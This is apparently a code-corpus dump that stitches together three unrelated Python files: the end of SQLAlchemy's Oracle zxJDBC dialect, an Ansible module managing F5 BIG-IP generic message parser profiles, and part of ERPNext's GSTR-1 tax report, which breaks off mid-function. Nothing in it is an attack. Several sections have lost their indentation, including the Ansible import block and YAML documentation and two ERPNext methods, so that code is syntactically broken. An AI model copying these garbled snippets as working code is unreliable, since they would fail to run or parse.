        """Render ``RETURNING ... INTO ...`` and register the out-parameters."""
        self.returning_cols = list(
            expression._select_iterables(returning_cols)
        )
        # within_columns_clause=False so that labels (foo AS bar) don't render
        columns = [
            self.process(c, within_columns_clause=False)
            for c in self.returning_cols
        ]
        if not hasattr(self, "returning_parameters"):
            self.returning_parameters = []
        binds = []
        for i, col in enumerate(self.returning_cols):
            # DBAPI type recorded (1-based position) so the execution context
            # can later fetch the value from the driver's return result set.
            dbtype = col.type.dialect_impl(self.dialect).get_dbapi_type(
                self.dialect.dbapi
            )
            self.returning_parameters.append((i + 1, dbtype))
            # Each returned column gets a placeholder bind carrying a
            # ReturningParam marker instead of a real value.
            bindparam = sql.bindparam(
                "ret_%d" % i, value=ReturningParam(dbtype)
            )
            self.binds[bindparam.key] = bindparam
            binds.append(
                self.bindparam_string(self._truncate_bindparam(bindparam))
            )
        return "RETURNING " + ", ".join(columns) + " INTO " + ", ".join(binds)
class OracleExecutionContext_zxjdbc(OracleExecutionContext):
    """Execution context that retrieves RETURNING values through zxJDBC."""
    def pre_exec(self):
        if hasattr(self.compiled, "returning_parameters"):
            # prepare a zxJDBC statement so we can grab its underlying
            # OraclePreparedStatement's getReturnResultSet later
            self.statement = self.cursor.prepare(self.statement)
    def get_result_proxy(self):
        """Return a ResultProxy, buffering the RETURNING row when present."""
        if hasattr(self.compiled, "returning_parameters"):
            rrs = None
            try:
                try:
                    rrs = self.statement.__statement__.getReturnResultSet()
                    next(rrs)
                except SQLException as sqle:
                    # Re-raise JDBC failures as DBAPI errors, preserving the
                    # vendor code and SQLState for diagnosis.
                    msg = "%s [SQLCode: %d]" % (
                        sqle.getMessage(),
                        sqle.getErrorCode(),
                    )
                    if sqle.getSQLState() is not None:
                        msg += " [SQLState: %s]" % sqle.getSQLState()
                    raise zxJDBC.Error(msg)
                else:
                    # Pull each registered out-parameter from the driver's
                    # return result set using its recorded DBAPI type.
                    row = tuple(
                        self.cursor.datahandler.getPyObject(rrs, index, dbtype)
                        for index, dbtype in self.compiled.returning_parameters
                    )
                    return ReturningResultProxy(self, row)
            finally:
                # Close the return result set and statement regardless of
                # success; result-set close failures are not fatal.
                if rrs is not None:
                    try:
                        rrs.close()
                    except SQLException:
                        pass
                self.statement.close()
        return _result.ResultProxy(self)
    def create_cursor(self):
        # Wrap the default datahandler so ReturningParam binds get
        # special-cased (see OracleReturningDataHandler).
        cursor = self._dbapi_connection.cursor()
        cursor.datahandler = self.dialect.DataHandler(cursor.datahandler)
        return cursor
class ReturningResultProxy(_result.FullyBufferedResultProxy):
    """ResultProxy backed by the RETURNING ResultSet results."""
    def __init__(self, context, returning_row):
        # The single pre-fetched row produced by the RETURNING clause.
        self._returning_row = returning_row
        super(ReturningResultProxy, self).__init__(context)
    def _cursor_description(self):
        """Synthesize a cursor description from the compiled RETURNING columns."""
        ret = []
        for c in self.context.compiled.returning_cols:
            if hasattr(c, "name"):
                ret.append((c.name, c.type))
            else:
                # Anonymous expressions fall back to their generated label.
                ret.append((c.anon_label, c.type))
        return ret
    def _buffer_rows(self):
        # Exactly one row comes back from RETURNING ... INTO.
        return collections.deque([self._returning_row])
class ReturningParam(object):
    """A bindparam value representing a RETURNING parameter.

    Specially handled by OracleReturningDataHandler.
    """

    def __init__(self, type_):
        self.type = type_

    def __eq__(self, other):
        # Guard-clause style: defer to the other operand for foreign types.
        if not isinstance(other, ReturningParam):
            return NotImplemented
        return self.type == other.type

    def __ne__(self, other):
        if not isinstance(other, ReturningParam):
            return NotImplemented
        return self.type != other.type

    def __repr__(self):
        cls = type(self)
        return "<%s.%s object at 0x%x type=%s>" % (
            cls.__module__,
            cls.__name__,
            id(self),
            self.type,
        )
class OracleDialect_zxjdbc(ZxJDBCConnector, OracleDialect):
    """Oracle dialect for the Jython-only zxJDBC DBAPI."""
    jdbc_db_name = "oracle"
    jdbc_driver_name = "oracle.jdbc.OracleDriver"
    statement_compiler = OracleCompiler_zxjdbc
    execution_ctx_cls = OracleExecutionContext_zxjdbc
    colspecs = util.update_copy(
        OracleDialect.colspecs,
        {sqltypes.Date: _ZxJDBCDate, sqltypes.Numeric: _ZxJDBCNumeric},
    )
    def __init__(self, *args, **kwargs):
        super(OracleDialect_zxjdbc, self).__init__(*args, **kwargs)
        # These Java-side imports only resolve under Jython; the module-level
        # names are populated here so the rest of the module can use them.
        global SQLException, zxJDBC
        from java.sql import SQLException
        from com.ziclix.python.sql import zxJDBC
        from com.ziclix.python.sql.handler import OracleDataHandler
        class OracleReturningDataHandler(OracleDataHandler):
            """zxJDBC DataHandler that specially handles ReturningParam."""
            def setJDBCObject(self, statement, index, object_, dbtype=None):
                # A ReturningParam is not a real value; register it as a
                # JDBC return parameter instead of binding it.
                if type(object_) is ReturningParam:
                    statement.registerReturnParameter(index, object_.type)
                elif dbtype is None:
                    OracleDataHandler.setJDBCObject(
                        self, statement, index, object_
                    )
                else:
                    OracleDataHandler.setJDBCObject(
                        self, statement, index, object_, dbtype
                    )
        self.DataHandler = OracleReturningDataHandler
    def initialize(self, connection):
        super(OracleDialect_zxjdbc, self).initialize(connection)
        # Implicit RETURNING requires the 10.2+ JDBC driver.
        self.implicit_returning = connection.connection.driverversion >= "10.2"
    def _create_jdbc_url(self, url):
        """Build a thin-driver JDBC URL; the Oracle default port is 1521."""
        return "jdbc:oracle:thin:@%s:%s:%s" % (
            url.host,
            url.port or 1521,
            url.database,
        )
    def _get_server_version_info(self, connection):
        """Parse the 'Release x.y.z' banner into an int tuple."""
        version = re.search(
            r"Release ([\d\.]+)", connection.connection.dbversion
        ).group(1)
        return tuple(int(x) for x in version.split("."))
# DBAPI entry point expected by the SQLAlchemy dialect loader.
dialect = OracleDialect_zxjdbc
| mit |
aperigault/ansible | lib/ansible/modules/network/f5/bigip_message_routing_protocol.py | 24 | 17365 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2019, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
# Standard Ansible module metadata consumed by ansible-doc and CI tooling.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: bigip_message_routing_protocol
short_description: Manage generic message parser profile.
description:
- Manages generic message parser profile for use with the message routing framework.
version_added: 2.9
options:
name:
description:
- Specifies the name of the generic parser profile.
required: True
type: str
description:
description:
- The user defined description of the generic parser profile.
type: str
parent:
description:
- The parent template of this parser profile. Once this value has been set, it cannot be changed.
- When creating a new profile, if this parameter is not specified,
the default is the system-supplied C(genericmsg) profile.
type: str
disable_parser:
description:
- When C(yes), the generic message parser will be disabled, ignoring all incoming packets and not directly
sending message data.
- This mode supports iRule script protocol implementations that will generate messages from the incoming transport
stream and send outgoing messages on the outgoing transport stream.
type: bool
max_egress_buffer:
description:
- Specifies the maximum size of the send buffer in bytes. If the number of bytes in the send buffer for a
connection exceeds this value, the generic message protocol will stop receiving outgoing messages from the
router until the size of the buffer drops below this setting.
- The accepted range is between 0 and 4294967295 inclusive.
type: int
max_msg_size:
description:
- Specifies the maximum size of a received message. If a message exceeds this size, the connection will be reset.
- The accepted range is between 0 and 4294967295 inclusive.
type: int
msg_terminator:
description:
- The string of characters used to terminate a message. If the message-terminator is not specified,
the generic message parser will not separate the input stream into messages.
type: str
no_response:
description:
- When set, matching of responses to requests is disabled.
type: bool
partition:
description:
- Device partition to create route object on.
type: str
default: Common
state:
description:
- When C(present), ensures that the route exists.
- When C(absent), ensures the route is removed.
type: str
choices:
- present
- absent
default: present
notes:
- Requires BIG-IP >= 14.0.0
extends_documentation_fragment: f5
author:
- Wojciech Wypior (@wojtek0806)
'''
EXAMPLES = r'''
- name: Create a generic parser
bigip_message_routing_protocol:
name: foo
description: 'This is parser'
no_response: yes
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Modify a generic parser
bigip_message_routing_protocol:
name: foo
no_response: no
max_egress_buffer: 10000
max_msg_size: 2000
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
- name: Remove generic parser
bigip_message_routing_protocol:
name: foo
state: absent
provider:
password: secret
server: lb.mydomain.com
user: admin
delegate_to: localhost
'''
RETURN = r'''
description:
description: The user defined description of the parser profile.
returned: changed
type: str
sample: My description
parent:
description: The parent template of this parser profile.
returned: changed
type: str
sample: /Common/genericmsg
disable_parser:
description: Disables generic message parser.
returned: changed
type: bool
sample: yes
max_egress_buffer:
description: The maximum size of the send buffer in bytes.
returned: changed
type: int
sample: 10000
max_msg_size:
description: The maximum size of a received message.
returned: changed
type: int
sample: 4000
msg_terminator:
description: The string of characters used to terminate a message.
returned: changed
type: str
sample: '%%%%'
no_response:
description: Disables matching of responses to requests.
returned: changed
type: bool
sample: yes
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.basic import env_fallback
from distutils.version import LooseVersion
try:
from library.module_utils.network.f5.bigip import F5RestClient
from library.module_utils.network.f5.common import F5ModuleError
from library.module_utils.network.f5.common import AnsibleF5Parameters
from library.module_utils.network.f5.common import fq_name
from library.module_utils.network.f5.common import transform_name
from library.module_utils.network.f5.common import f5_argument_spec
from library.module_utils.network.f5.common import flatten_boolean
from library.module_utils.network.f5.compare import cmp_str_with_none
from library.module_utils.network.f5.icontrol import tmos_version
except ImportError:
from ansible.module_utils.network.f5.bigip import F5RestClient
from ansible.module_utils.network.f5.common import F5ModuleError
from ansible.module_utils.network.f5.common import AnsibleF5Parameters
from ansible.module_utils.network.f5.common import fq_name
from ansible.module_utils.network.f5.common import transform_name
from ansible.module_utils.network.f5.common import f5_argument_spec
from ansible.module_utils.network.f5.common import flatten_boolean
from ansible.module_utils.network.f5.compare import cmp_str_with_none
from ansible.module_utils.network.f5.icontrol import tmos_version
class Parameters(AnsibleF5Parameters):
    """Base mapping between Ansible option names and BIG-IP REST attributes."""
    # REST API attribute name -> module option name.
    api_map = {
        'defaultsFrom': 'parent',
        'disableParser': 'disable_parser',
        'maxEgressBuffer': 'max_egress_buffer',
        'maxMessageSize': 'max_msg_size',
        'messageTerminator': 'msg_terminator',
        'noResponse': 'no_response',
    }
    # Attributes serialized into API create/update payloads.
    api_attributes = [
        'description',
        'defaultsFrom',
        'disableParser',
        'maxEgressBuffer',
        'maxMessageSize',
        'messageTerminator',
        'noResponse',
    ]
    # Option names echoed back to the user in the module result.
    returnables = [
        'description',
        'parent',
        'disable_parser',
        'max_egress_buffer',
        'max_msg_size',
        'msg_terminator',
        'no_response',
    ]
    # Option names considered when diffing desired vs. current state.
    updatables = [
        'description',
        'parent',
        'disable_parser',
        'max_egress_buffer',
        'max_msg_size',
        'msg_terminator',
        'no_response',
    ]
    @property
    def no_response(self):
        # Normalized through the shared flatten_boolean helper.
        return flatten_boolean(self._values['no_response'])
    @property
    def disable_parser(self):
        return flatten_boolean(self._values['disable_parser'])
class ApiParameters(Parameters):
    # Parameters as read back from the BIG-IP REST API; no normalization
    # beyond the base class mappings is required.
    pass
class ModuleParameters(Parameters):
    """User-supplied module parameters, normalized and validated."""

    # TMUI stores these sizes as unsigned 32-bit integers.
    _UINT32_MAX = 4294967295

    @property
    def parent(self):
        """Fully-qualified parent profile name (/partition/name), or None."""
        if self._values['parent'] is None:
            return None
        result = fq_name(self.partition, self._values['parent'])
        return result

    def _uint32_or_error(self, key):
        # Shared range check for the unsigned 32-bit size options; the two
        # original properties duplicated this logic verbatim.
        value = self._values[key]
        if value is None:
            return None
        if 0 <= value <= self._UINT32_MAX:
            return value
        raise F5ModuleError(
            "Valid '{0}' must be in range 0 - {1}.".format(key, self._UINT32_MAX)
        )

    @property
    def max_msg_size(self):
        """Validated maximum received-message size, or None when unset."""
        return self._uint32_or_error('max_msg_size')

    @property
    def max_egress_buffer(self):
        """Validated maximum send-buffer size, or None when unset."""
        return self._uint32_or_error('max_egress_buffer')
class Changes(Parameters):
    """Parameter set representing a pending or reportable group of changes."""

    def to_return(self):
        """Collect the returnable attribute values, best-effort."""
        gathered = {}
        try:
            for name in self.returnables:
                gathered[name] = getattr(self, name)
            gathered = self._filter_params(gathered)
        except Exception:
            # Never fail while assembling output; whatever was gathered
            # before the error is returned as-is.
            pass
        return gathered
class UsableChanges(Changes):
    # Changes shaped for submission to the BIG-IP REST API.
    pass
class ReportableChanges(Changes):
    # Changes shaped for reporting back to the Ansible user.
    pass
class Difference(object):
    """Computes per-parameter differences between desired and current state."""
    def __init__(self, want, have=None):
        self.want = want
        self.have = have
    def compare(self, param):
        """Return the changed value for *param*, or None when unchanged."""
        try:
            # A property defined on this class overrides the default
            # comparison for that parameter.
            result = getattr(self, param)
            return result
        except AttributeError:
            return self.__default(param)
    def __default(self, param):
        # Simple inequality comparison; a missing current value means the
        # desired value counts as a change.
        attr1 = getattr(self.want, param)
        try:
            attr2 = getattr(self.have, param)
            if attr1 != attr2:
                return attr1
        except AttributeError:
            return attr1
    @property
    def parent(self):
        if self.want.parent is None:
            return None
        if self.want.parent != self.have.parent:
            # TMOS does not allow re-parenting an existing profile.
            raise F5ModuleError(
                "The parent router profile cannot be changed."
            )
    @property
    def description(self):
        # None-aware string comparison (shared F5 helper).
        return cmp_str_with_none(self.want.description, self.have.description)
    @property
    def msg_terminator(self):
        return cmp_str_with_none(self.want.msg_terminator, self.have.msg_terminator)
class ModuleManager(object):
    """Drives the declarative present/absent workflow against the REST API."""
    def __init__(self, *args, **kwargs):
        self.module = kwargs.get('module', None)
        self.client = F5RestClient(**self.module.params)
        # want: desired state from user input; have: current device state.
        self.want = ModuleParameters(params=self.module.params)
        self.have = ApiParameters()
        self.changes = UsableChanges()
    def _set_changed_options(self):
        # On create, every explicitly supplied option counts as a change.
        changed = {}
        for key in Parameters.returnables:
            if getattr(self.want, key) is not None:
                changed[key] = getattr(self.want, key)
        if changed:
            self.changes = UsableChanges(params=changed)
    def _update_changed_options(self):
        # On update, diff want vs. have; returns True when anything differs.
        diff = Difference(self.want, self.have)
        updatables = Parameters.updatables
        changed = dict()
        for k in updatables:
            change = diff.compare(k)
            if change is None:
                continue
            else:
                if isinstance(change, dict):
                    changed.update(change)
                else:
                    changed[k] = change
        if changed:
            self.changes = UsableChanges(params=changed)
            return True
        return False
    def _announce_deprecations(self, result):
        warnings = result.pop('__warnings', [])
        for warning in warnings:
            # NOTE(review): sibling F5 modules call self.module.deprecate();
            # confirm that F5RestClient actually exposes a .module attribute.
            self.client.module.deprecate(
                msg=warning['msg'],
                version=warning['version']
            )
    def version_less_than_14(self):
        # Message routing only exists on TMOS 14.0.0 and newer.
        version = tmos_version(self.client)
        if LooseVersion(version) < LooseVersion('14.0.0'):
            return True
        return False
    def exec_module(self):
        """Entry point: apply the requested state, return the result dict."""
        if self.version_less_than_14():
            raise F5ModuleError('Message routing is not supported on TMOS version below 14.x')
        changed = False
        result = dict()
        state = self.want.state
        if state == "present":
            changed = self.present()
        elif state == "absent":
            changed = self.absent()
        reportable = ReportableChanges(params=self.changes.to_return())
        changes = reportable.to_return()
        result.update(**changes)
        result.update(dict(changed=changed))
        self._announce_deprecations(result)
        return result
    def present(self):
        # Ensure the profile exists, updating it when it already does.
        if self.exists():
            return self.update()
        else:
            return self.create()
    def absent(self):
        if self.exists():
            return self.remove()
        return False
    def should_update(self):
        result = self._update_changed_options()
        if result:
            return True
        return False
    def update(self):
        self.have = self.read_current_from_device()
        if not self.should_update():
            return False
        if self.module.check_mode:
            # Report "would change" without touching the device.
            return True
        self.update_on_device()
        return True
    def remove(self):
        if self.module.check_mode:
            return True
        self.remove_from_device()
        # Verify the deletion actually took effect.
        if self.exists():
            raise F5ModuleError("Failed to delete the resource.")
        return True
    def create(self):
        self._set_changed_options()
        if self.module.check_mode:
            return True
        self.create_on_device()
        return True
    def exists(self):
        """Return True when the named protocol profile exists on the device."""
        uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError:
            # A non-JSON body is treated as "not found".
            return False
        if resp.status == 404 or 'code' in response and response['code'] == 404:
            return False
        return True
    def create_on_device(self):
        """POST the new profile; raise F5ModuleError on API errors."""
        params = self.changes.api_params()
        params['name'] = self.want.name
        params['partition'] = self.want.partition
        uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
        )
        resp = self.client.api.post(uri, json=params)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        # 409 covers "already exists" conflicts on create.
        if 'code' in response and response['code'] in [400, 409]:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
        return True
    def update_on_device(self):
        """PATCH only the changed attributes onto the existing profile."""
        params = self.changes.api_params()
        uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        resp = self.client.api.patch(uri, json=params)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
    def remove_from_device(self):
        """DELETE the profile; raise F5ModuleError unless HTTP 200 is returned."""
        uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        response = self.client.api.delete(uri)
        if response.status == 200:
            return True
        raise F5ModuleError(response.content)
    def read_current_from_device(self):
        """GET the current profile state and wrap it in ApiParameters."""
        uri = "https://{0}:{1}/mgmt/tm/ltm/message-routing/generic/protocol/{2}".format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            transform_name(self.want.partition, self.want.name)
        )
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)
        return ApiParameters(params=response)
class ArgumentSpec(object):
    """Builds the AnsibleModule argument specification for this module."""
    def __init__(self):
        self.supports_check_mode = True
        argument_spec = dict(
            name=dict(required=True),
            description=dict(),
            parent=dict(),
            disable_parser=dict(type='bool'),
            max_egress_buffer=dict(type='int'),
            max_msg_size=dict(type='int'),
            msg_terminator=dict(),
            no_response=dict(type='bool'),
            partition=dict(
                default='Common',
                fallback=(env_fallback, ['F5_PARTITION'])
            ),
            state=dict(
                default='present',
                choices=['present', 'absent']
            )
        )
        self.argument_spec = {}
        # Shared F5 connection options first, then the module-specific ones.
        self.argument_spec.update(f5_argument_spec)
        self.argument_spec.update(argument_spec)
def main():
    """Module entry point: build the spec, run the manager, report results."""
    spec = ArgumentSpec()
    module = AnsibleModule(
        argument_spec=spec.argument_spec,
        supports_check_mode=spec.supports_check_mode,
    )
    try:
        mm = ModuleManager(module=module)
        results = mm.exec_module()
        module.exit_json(**results)
    except F5ModuleError as ex:
        # Surface expected errors as a clean Ansible failure.
        module.fail_json(msg=str(ex))
if __name__ == '__main__':
    main()
| gpl-3.0 |
frappe/erpnext | erpnext/regional/report/gstr_1/gstr_1.py | 2 | 24910 | # Copyright (c) 2013, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe, json
from frappe import _
from frappe.utils import flt, formatdate, now_datetime, getdate
from datetime import date
from six import iteritems
from erpnext.regional.doctype.gstr_3b_report.gstr_3b_report import get_period
from erpnext.regional.india.utils import get_gst_accounts
def execute(filters=None):
    """Standard Frappe report entry point; returns (columns, data)."""
    return Gstr1Report(filters).run()
class Gstr1Report(object):
    def __init__(self, filters=None):
        """Prepare report state.

        filters: dict-like report filters (company, from_date, to_date,
        company_address, type_of_business, ...).
        """
        self.filters = frappe._dict(filters or {})
        self.columns = []
        self.data = []
        self.doctype = "Sales Invoice"
        self.tax_doctype = "Sales Taxes and Charges"
        # Columns selected from the Sales Invoice table; customer_gstin
        # falls back to billing_address_gstin when empty.
        self.select_columns = """
            name as invoice_number,
            customer_name,
            posting_date,
            base_grand_total,
            base_rounded_total,
            COALESCE(NULLIF(customer_gstin,''), NULLIF(billing_address_gstin, '')) as customer_gstin,
            place_of_supply,
            ecommerce_gstin,
            reverse_charge,
            return_against,
            is_return,
            is_debit_note,
            gst_category,
            export_type,
            port_code,
            shipping_bill_number,
            shipping_bill_date,
            reason_for_issuing_document
        """
    def run(self):
        """Drive the report: fetch invoices, group items by tax rate, build rows.

        Returns (columns, data) as expected by the Frappe report framework.
        """
        self.get_columns()
        # only_non_reverse_charge=1: reverse-charge GST accounts are excluded.
        self.gst_accounts = get_gst_accounts(self.filters.company, only_non_reverse_charge=1)
        self.get_invoice_data()

        if self.invoices:
            self.get_invoice_items()
            self.get_items_based_on_tax_rate()
            self.invoice_fields = [d["fieldname"] for d in self.invoice_columns]

        self.get_data()

        return self.columns, self.data
    def get_data(self):
        """Build self.data: one row per (invoice, tax rate) combination.

        B2C sections are aggregated separately in get_b2c_data().
        """
        if self.filters.get("type_of_business") in ("B2C Small", "B2C Large"):
            self.get_b2c_data()
        else:
            for inv, items_based_on_rate in self.items_based_on_tax_rate.items():
                invoice_details = self.invoices.get(inv)
                for rate, items in items_based_on_rate.items():
                    row, taxable_value = self.get_row_data_for_invoice(inv, invoice_details, rate, items)

                    if self.filters.get("type_of_business") == "CDNR-REG":
                        # Pre-GST flag ("Y"/"N") relative to GST rollout.
                        # NOTE(review): `<=` includes 1 July 2017 itself as
                        # pre-GST — confirm the intended boundary.
                        row.append("Y" if invoice_details.posting_date <= date(2017, 7, 1) else "N")
                        # Document type: Credit note for returns, else Debit note.
                        row.append("C" if invoice_details.is_return else "D")

                    if taxable_value:
                        self.data.append(row)
def get_b2c_data(self):
b2cs_output = {}
for inv, items_based_on_rate in self.items_based_on_tax_rate.items():
invoice_details = self.invoices.get(inv)
for rate, items in items_based_on_rate.items():
place_of_supply = invoice_details.get("place_of_supply")
ecommerce_gstin = invoice_details.get("ecommerce_gstin")
b2cs_output.setdefault((rate, place_of_supply, ecommerce_gstin),{
"place_of_supply": "",
"ecommerce_gstin": "",
"rate": "",
"taxable_value": 0,
"cess_amount": 0,
"type": "",
"invoice_number": invoice_details.get("invoice_number"),
"posting_date": invoice_details.get("posting_date"),
"invoice_value": invoice_details.get("base_grand_total"),
})
row = b2cs_output.get((rate, place_of_supply, ecommerce_gstin))
row["place_of_supply"] = place_of_supply
row["ecommerce_gstin"] = ecommerce_gstin
row["rate"] = rate
row["taxable_value"] += sum([abs(net_amount)
for item_code, net_amount in self.invoice_items.get(inv).items() if item_code in items])
row["cess_amount"] += flt(self.invoice_cess.get(inv), 2)
row["type"] = "E" if ecommerce_gstin else "OE"
for key, value in iteritems(b2cs_output):
self.data.append(value)
    def get_row_data_for_invoice(self, invoice, invoice_details, tax_rate, items):
        """Return (row, taxable_value) for one invoice at one tax rate.

        `row` holds the configured invoice columns, then the tax rate and
        taxable value, then extra columns (e.g. cess amount).
        """
        row = []
        for fieldname in self.invoice_fields:
            if self.filters.get("type_of_business") == "CDNR-REG" and fieldname == "invoice_value":
                # Credit/debit notes are reported as absolute values.
                row.append(abs(invoice_details.base_rounded_total) or abs(invoice_details.base_grand_total))
            elif fieldname == "invoice_value":
                row.append(invoice_details.base_rounded_total or invoice_details.base_grand_total)
            elif fieldname in ('posting_date', 'shipping_bill_date'):
                row.append(formatdate(invoice_details.get(fieldname), 'dd-MMM-YY'))
            elif fieldname == "export_type":
                # WPAY = with payment of tax, WOPAY = without.
                export_type = "WPAY" if invoice_details.get(fieldname)=="With Payment of Tax" else "WOPAY"
                row.append(export_type)
            else:
                row.append(invoice_details.get(fieldname))

        taxable_value = 0

        # CGST+SGST invoices carry a combined rate, so per-item rates are
        # matched against tax_rate / 2.
        if invoice in self.cgst_sgst_invoices:
            division_factor = 2
        else:
            division_factor = 1

        for item_code, net_amount in self.invoice_items.get(invoice).items():
            if item_code in items:
                if self.item_tax_rate.get(invoice) and tax_rate/division_factor in self.item_tax_rate.get(invoice, {}).get(item_code, []):
                    taxable_value += abs(net_amount)
                elif not self.item_tax_rate.get(invoice):
                    taxable_value += abs(net_amount)
                elif tax_rate:
                    taxable_value += abs(net_amount)
                elif not tax_rate and self.filters.get('type_of_business') == 'EXPORT' \
                        and invoice_details.get('export_type') == "Without Payment of Tax":
                    # Zero-rated exports without payment of tax still count.
                    taxable_value += abs(net_amount)

        row += [tax_rate or 0, taxable_value]

        for column in self.other_columns:
            if column.get('fieldname') == 'cess_amount':
                row.append(flt(self.invoice_cess.get(invoice), 2))

        return row, taxable_value
    def get_invoice_data(self):
        """Fetch submitted, non-opening invoices for the period into self.invoices,
        keyed by invoice name (newest first)."""
        self.invoices = frappe._dict()
        conditions = self.get_conditions()

        # All of the company's own GSTINs, used to exclude self-billing.
        company_gstins = get_company_gstin_number(self.filters.get('company'), all_gstins=True)
        self.filters.update({
            'company_gstins': company_gstins
        })

        invoice_data = frappe.db.sql("""
            select
                {select_columns}
            from `tab{doctype}`
            where docstatus = 1 {where_conditions}
            and is_opening = 'No'
            order by posting_date desc
            """.format(select_columns=self.select_columns, doctype=self.doctype,
                where_conditions=conditions), self.filters, as_dict=1)

        for d in invoice_data:
            # setdefault keeps the first (most recent) row per invoice.
            self.invoices.setdefault(d.invoice_number, d)
    def get_conditions(self):
        """Build the extra SQL WHERE clause for the selected filters and
        type_of_business. Values are bound via %(name)s placeholders."""
        conditions = ""

        for opts in (("company", " and company=%(company)s"),
            ("from_date", " and posting_date>=%(from_date)s"),
            ("to_date", " and posting_date<=%(to_date)s"),
            ("company_address", " and company_address=%(company_address)s")):
                if self.filters.get(opts[0]):
                    conditions += opts[1]

        if self.filters.get("type_of_business") ==  "B2B":
            conditions += "AND IFNULL(gst_category, '') in ('Registered Regular', 'Deemed Export', 'SEZ') AND is_return != 1"

        if self.filters.get("type_of_business") in ("B2C Large", "B2C Small"):
            # The B2C Large / Small split is driven by the configured limit.
            b2c_limit = frappe.db.get_single_value('GST Settings', 'b2c_limit')
            if not b2c_limit:
                frappe.throw(_("Please set B2C Limit in GST Settings."))

        if self.filters.get("type_of_business") ==  "B2C Large":
            # Inter-state supplies above the limit.
            conditions += """ AND ifnull(SUBSTR(place_of_supply, 1, 2),'') != ifnull(SUBSTR(company_gstin, 1, 2),'')
                AND grand_total > {0} AND is_return != 1 and gst_category ='Unregistered' """.format(flt(b2c_limit))

        elif self.filters.get("type_of_business") ==  "B2C Small":
            # Intra-state supplies, or inter-state at/below the limit.
            conditions += """ AND (
                SUBSTR(place_of_supply, 1, 2) = SUBSTR(company_gstin, 1, 2)
                OR grand_total <= {0}) and is_return != 1 AND gst_category ='Unregistered' """.format(flt(b2c_limit))

        elif self.filters.get("type_of_business") ==  "CDNR-REG":
            conditions += """ AND (is_return = 1 OR is_debit_note = 1) AND IFNULL(gst_category, '') in ('Registered Regular', 'Deemed Export', 'SEZ')"""

        elif self.filters.get("type_of_business") ==  "EXPORT":
            conditions += """ AND is_return !=1 and gst_category = 'Overseas' """

        # Never report supplies made to the company's own GSTINs.
        conditions += " AND IFNULL(billing_address_gstin, '') NOT IN %(company_gstins)s"

        return conditions
def get_invoice_items(self):
self.invoice_items = frappe._dict()
self.item_tax_rate = frappe._dict()
items = frappe.db.sql("""
select item_code, parent, taxable_value, base_net_amount, item_tax_rate
from `tab%s Item`
where parent in (%s)
""" % (self.doctype, ', '.join(['%s']*len(self.invoices))), tuple(self.invoices), as_dict=1)
for d in items:
if d.item_code not in self.invoice_items.get(d.parent, {}):
self.invoice_items.setdefault(d.parent, {}).setdefault(d.item_code,
sum((i.get('taxable_value', 0) or i.get('base_net_amount', 0)) for i in items
if i.item_code == d.item_code and i.parent == d.parent))
item_tax_rate = {}
if d.item_tax_rate:
item_tax_rate = json.loads(d.item_tax_rate)
for account, rate in item_tax_rate.items():
tax_rate_dict = self.item_tax_rate.setdefault(d.parent, {}).setdefault(d.item_code, [])
tax_rate_dict.append(rate)
    def get_items_based_on_tax_rate(self):
        """Group each invoice's items by effective GST rate.

        Populates:
          self.items_based_on_tax_rate: {invoice: {rate: [item codes]}}
          self.invoice_cess: {invoice: cess amount}
          self.cgst_sgst_invoices: invoices taxed as CGST+SGST (intra-state)
        """
        self.tax_details = frappe.db.sql("""
            select
                parent, account_head, item_wise_tax_detail, base_tax_amount_after_discount_amount
            from `tab%s`
            where
                parenttype = %s and docstatus = 1
                and parent in (%s)
            order by account_head
        """ % (self.tax_doctype, '%s', ', '.join(['%s']*len(self.invoices.keys()))),
            tuple([self.doctype] + list(self.invoices.keys())))

        self.items_based_on_tax_rate = {}
        self.invoice_cess = frappe._dict()
        self.cgst_sgst_invoices = []

        unidentified_gst_accounts = []
        unidentified_gst_accounts_invoice = []
        for parent, account, item_wise_tax_detail, tax_amount in self.tax_details:
            if account in self.gst_accounts.cess_account:
                self.invoice_cess.setdefault(parent, tax_amount)
            else:
                if item_wise_tax_detail:
                    try:
                        # item_wise_tax_detail: JSON {item_code: [rate, amount]}.
                        item_wise_tax_detail = json.loads(item_wise_tax_detail)
                        cgst_or_sgst = False
                        if account in self.gst_accounts.cgst_account \
                            or account in self.gst_accounts.sgst_account:
                            cgst_or_sgst = True

                        if not (cgst_or_sgst or account in self.gst_accounts.igst_account):
                            # Looks like a GST account but isn't configured in
                            # GST Settings; remember it for the warning below.
                            if "gst" in account.lower() and account not in unidentified_gst_accounts:
